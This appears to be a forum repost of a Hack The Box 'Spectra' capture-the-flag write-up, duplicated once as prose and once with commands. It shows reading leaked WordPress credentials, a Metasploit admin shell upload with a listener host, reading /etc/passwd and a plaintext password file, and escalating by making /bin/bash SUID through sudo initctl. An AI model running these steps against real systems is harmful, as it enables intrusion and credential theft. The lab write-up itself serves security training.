TheScription
Visual Recon Expert
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
Today we are going to accept the boot2root challenge of Spectra âHack the box lab. Through this lab, we are going to check our skills in WordPress Exploitation and basic privilege escalation.
Table Of Content
Reconnaissance
Enumeration
Exploitation
Privilege Escalation
Reconnaissance
Letâs start our journey.
Through Nmap scan, we get to know that there are three open ports i.e. Port 22 âSSH version OpenSSH 8.1, Port 80 âHTTP, and port 3306 âMySQL.
First, we are exploring Port 80 in the web browser, and get a simple page with having two links Software Issue Tracker and Test.
Enumeration
Both links Redirected to spectra.htb, so We need to edit the host file.
Now we will try to explore both links found after navigating port 80. Once we click on the test link we get the âerror establishing a database connectionâ. It seems nothing important.
We navigate spectra.htb/testing in the web browser and we find two wordpress config files i.e wp-config.php and wp-config.php.save.
Wp-config.php.save is the base configuration file for WordPress.After access it through curl we find something interesting in it i.eMYSQL database credentialâs username âdevtestâ and password devteam01
Happily, we login the WordPress but unfortunately, the above-found credentials are not working, and getting the errorâ Unknown username. Check again or try your email addressâ.
Looking back, now itâs time to explore the first link software issue tracker found on HTTP 80.
This leads us to a basic WordPress page with the administratorâs sample post. We learn from this that the username âAdministratorâ is a viable option. We go to the wp-login page once more to log in.
Great!! Successfully we logged in and it redirects to the administration email verification.
Just click on âThis email is correctâ and get into it.
Exploitation
After some enumeration, we find that the WordPress version is not updated. Accordingly, we explore the Metasploit exploit and set the required options as we have already fetched the username and password i.e. administrator and devteam01 respectively. Below is the module:
While doing enumeration, we come across there is another user name as âKatieâ.
Very soon we decide that user Katie does not have permission to access user.txt.
After some file enumeration, an intriguing script autologin.conf.orig find in the /opt/ directory
This script retrieves a password from the passwd file in the /etc/autologin directory.
I navigate to the file and grab the password. Next, I try the password against my list of users found above.
Privilege Escalation
Letâs utilise the credential we enumerated for user Katie to log into SSH. We discovered that Katie is a member of the developerâs group using the id command. We next checked Katieâs sudo rights and discovered that user can run /sbin/initctl as root. Initctl is a linux init daemon control utility.
Letâs abuse test.conf file and replace the existing content with the following line that will enable SUID bit for /bin/bash.
We can use Katieâs privilege to start test.conf, which will run the script to enable the SUID permission on /bin/bash, because user has root permission to run initctl.
Kudos!! Finally, we capture the ROOT flag after obtaining the root privilege shell.
Author: Nisha Sharma is an Experienced and Certified Security Consultant.Highly skilled in Infrastructure, web pentesting along with SIEM and other security devices. Connect with her here
Table Of Content
Reconnaissance
- Nmap
Enumeration
- Website enumeration
Exploitation
- WordPress Metasploit
Privilege Escalation
- Abusing Sudo rights
Reconnaissance
Letâs start our journey.
Code:
nmap âA 10.129.223.138Through Nmap scan, we get to know that there are three open ports i.e. Port 22 âSSH version OpenSSH 8.1, Port 80 âHTTP, and port 3306 âMySQL.
First, we are exploring Port 80 in the web browser, and get a simple page with having two links Software Issue Tracker and Test.
Code:
http:10.129.223.138Enumeration
Both links Redirected to spectra.htb, so We need to edit the host file.
Code:
cat /etc/hostsNow we will try to explore both links found after navigating port 80. Once we click on the test link we get the âerror establishing a database connectionâ. It seems nothing important.
We navigate spectra.htb/testing in the web browser and we find two wordpress config files i.e wp-config.php and wp-config.php.save.
Wp-config.php.save is the base configuration file for WordPress.After access it through curl we find something interesting in it i.eMYSQL database credentialâs username âdevtestâ and password devteam01
Code:
curl http://spectra.htb/testing/wp-config.php.saveHappily, we login the WordPress but unfortunately, the above-found credentials are not working, and getting the errorâ Unknown username. Check again or try your email addressâ.
Code:
spectra.htb/main/wp-login.phpLooking back, now itâs time to explore the first link software issue tracker found on HTTP 80.
This leads us to a basic WordPress page with the administratorâs sample post. We learn from this that the username âAdministratorâ is a viable option. We go to the wp-login page once more to log in.
Great!! Successfully we logged in and it redirects to the administration email verification.
Just click on âThis email is correctâ and get into it.
Exploitation
After some enumeration, we find that the WordPress version is not updated. Accordingly, we explore the Metasploit exploit and set the required options as we have already fetched the username and password i.e. administrator and devteam01 respectively. Below is the module:
Code:
use exploit/unix/webapp/wp_admin_shell_upload
set rhosts 10.129.223.138
set targeturi /main
set password devteam01
set lhost 10.10.14.100
exploitWhile doing enumeration, we come across there is another user name as âKatieâ.
Code:
cat /etc/passwdVery soon we decide that user Katie does not have permission to access user.txt.
Code:
cd /home/katie
ls
cat user.txtAfter some file enumeration, an intriguing script autologin.conf.orig find in the /opt/ directory
Code:
cd opt
ls -laThis script retrieves a password from the passwd file in the /etc/autologin directory.
Code:
cat autologin.config.origI navigate to the file and grab the password. Next, I try the password against my list of users found above.
Code:
cd /etc/autologin
ls -la
cat passwdPrivilege Escalation
Letâs utilise the credential we enumerated for user Katie to log into SSH. We discovered that Katie is a member of the developerâs group using the id command. We next checked Katieâs sudo rights and discovered that user can run /sbin/initctl as root. Initctl is a linux init daemon control utility.
Code:
ssh [email protected]
id
sudo âl
find / -type f âgroup developers 2>dev/null âls
cat /etc/init/test.confLetâs abuse test.conf file and replace the existing content with the following line that will enable SUID bit for /bin/bash.
Code:
chmod +s /bin/bash
end scriptWe can use Katieâs privilege to start test.conf, which will run the script to enable the SUID permission on /bin/bash, because user has root permission to run initctl.
Code:
sudo /sbin/initctl start test
/bin/bash âpKudos!! Finally, we capture the ROOT flag after obtaining the root privilege shell.
Author: Nisha Sharma is an Experienced and Certified Security Consultant.Highly skilled in Infrastructure, web pentesting along with SIEM and other security devices. Connect with her here